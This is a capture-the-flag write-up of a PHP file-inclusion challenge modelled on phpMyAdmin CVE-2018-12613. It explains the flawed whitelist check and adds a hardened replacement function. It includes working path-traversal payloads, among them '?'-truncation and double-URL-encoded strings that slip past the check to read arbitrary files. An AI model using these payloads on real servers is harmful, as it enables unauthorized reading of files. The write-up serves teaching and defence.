Challenge: https://buuoj.cn/challenges#WarmUp
Visiting source.php gives the source code:

```php
<?php
highlight_file(__FILE__);
class emmm
{
    public static function checkFile(&$page)
    {
        $whitelist = ["source"=>"source.php","hint"=>"hint.php"];
        if (! isset($page) || !is_string($page)) {
            echo "you can't see it";
            return false;
        }

        if (in_array($page, $whitelist)) {
            return true;
        }

        $_page = mb_substr(
            $page,
            0,
            mb_strpos($page . '?', '?')
        );
        if (in_array($_page, $whitelist)) {
            return true;
        }

        $_page = urldecode($page);
        $_page = mb_substr(
            $_page,
            0,
            mb_strpos($_page . '?', '?')
        );
        if (in_array($_page, $whitelist)) {
            return true;
        }
        echo "you can't see it";
        return false;
    }
}

if (! empty($_REQUEST['file'])
    && is_string($_REQUEST['file'])
    && emmm::checkFile($_REQUEST['file'])
) {
    include $_REQUEST['file'];
    exit;
} else {
    echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
}
?>
```
hint.php:

```
flag not here, and flag in ffffllllaaaagggg
```
This challenge is adapted from a file-inclusion vulnerability in phpMyAdmin, CVE-2018-12613:
https://blog.csdn.net/qq_33020901/article/details/80829269
- First, a file-inclusion trick, which is really just a form of directory traversal:

```php
// "nonexistent_dir" stands for a directory that does not exist
include 'nonexistent_dir/../a.php';
```

This still includes a.php successfully.
Now look at this piece of the code:

```php
$_page = mb_substr(
    $page,
    0,
    mb_strpos($page . '?', '?')
);
if (in_array($_page, $whitelist)) {
    return true;
}

$_page = urldecode($page);
$_page = mb_substr(
    $_page,
    0,
    mb_strpos($_page . '?', '?')
);
if (in_array($_page, $whitelist)) {
    return true;
}
echo "you can't see it";
return false;
```
Since we don't know where the ffffllllaaaagggg file actually is, we can first try to include hint.php.
- Using the first mb_substr: submit file=source.php?/../hint.php
PHP treats source.php? as a directory, then ../ goes back up to the current directory and includes hint.php.
On Windows this include throws an error, because a Windows file name cannot contain ?; buuoj runs on Linux, so it works there. Finally, submit file=source.php?/../../../../ffffllllaaaagggg to get the flag.
- Using the second mb_substr: submit file=source.php%253F/../../../../ffffllllaaaagggg
%253F is ? URL-encoded twice: the web server decodes it once to %3F, the code's urldecode turns that into ? for the whitelist check, but the string handed to include still only contains %3F, so this variant also works on Windows.
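To make the root cause concrete, here is an added example in PHP (my own code, not part of the original writeup or the challenge). `validatedPrefix()` re-implements the three stages of `checkFile()` but returns the string that was actually compared against the whitelist, so you can see side by side what was checked and what `include` would receive. `resolveInclude()` is a hardened replacement of my own design: the request carries only a whitelist key, the server maps it to a fixed file name, and `realpath()` confines the result to a base directory. The sample inputs are constructed and written as PHP sees them in `$_REQUEST`, i.e. after the web server's single round of URL decoding; `$baseDir` and the function names are assumptions, not names from the challenge.

```php
<?php
// Added example, not part of the original writeup or the challenge.
// It contrasts what checkFile() validates with what include() receives,
// and shows a hardened replacement.

// Same whitelist as the challenge.
$whitelist = ["source" => "source.php", "hint" => "hint.php"];

// Re-implementation of the challenge's three-stage check. Instead of
// true/false it returns the exact string that matched the whitelist,
// or null when no stage matched.
function validatedPrefix(string $page, array $whitelist): ?string
{
    // Stage 1: the raw value.
    if (in_array($page, $whitelist)) {
        return $page;
    }
    // Stage 2: everything before the first '?'.
    $cut = mb_substr($page, 0, mb_strpos($page . '?', '?'));
    if (in_array($cut, $whitelist)) {
        return $cut;
    }
    // Stage 3: URL-decode once more, then cut at '?' again.
    $decoded = urldecode($page);
    $cut = mb_substr($decoded, 0, mb_strpos($decoded . '?', '?'));
    if (in_array($cut, $whitelist)) {
        return $cut;
    }
    return null;
}

// Hardened version (my own design): the request names a whitelist KEY,
// the server chooses the file, and the raw request value never reaches
// include(). realpath() returns false for a missing file and collapses
// '..' itself, so a mapped file that resolves outside $baseDir is refused
// even if the whitelist is ever misconfigured.
function resolveInclude(string $key, array $whitelist, string $baseDir): ?string
{
    if (!array_key_exists($key, $whitelist)) {
        return null;
    }
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $whitelist[$key]);
    if ($base === false || $path === false) {
        return null;
    }
    if (strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

// Constructed inputs, written as PHP sees them in $_REQUEST, i.e. after the
// web server's single round of URL decoding (%253F has become %3F).
$samples = [
    "hint.php",
    "source.php?/../hint.php",
    "source.php%3F/../../../../ffffllllaaaagggg",
];

foreach ($samples as $page) {
    $checked = validatedPrefix($page, $whitelist);
    printf(
        "%-46s checked against whitelist: %-12s include() receives: %s\n",
        $page,
        var_export($checked, true),
        $checked === null ? "(refused)" : $page
    );
}

// With the hardened check only the key travels in the request; anything
// else, including the traversal strings above, is refused outright.
foreach (["hint", "source.php?/../hint.php"] as $key) {
    $resolved = resolveInclude($key, $whitelist, __DIR__);
    printf("%-46s resolves to: %s\n", $key, $resolved ?? "(refused)");
}
```

Run it with `php` from the directory that holds hint.php (otherwise `resolveInclude("hint", ...)` reports the file as refused because `realpath()` cannot find it). The first table shows the actual bug: for the traversal inputs the checker only ever looked at the prefix `source.php`, while `include` received the whole string, so the validated value and the used value are not the same thing. The fix does not try to sanitise the second string; it removes it, since the client never needs to name a path at all. The traversal works in the first place because PHP resolves the `..` components of an include path lexically before touching the filesystem, which is why the directory before `/..` does not need to exist.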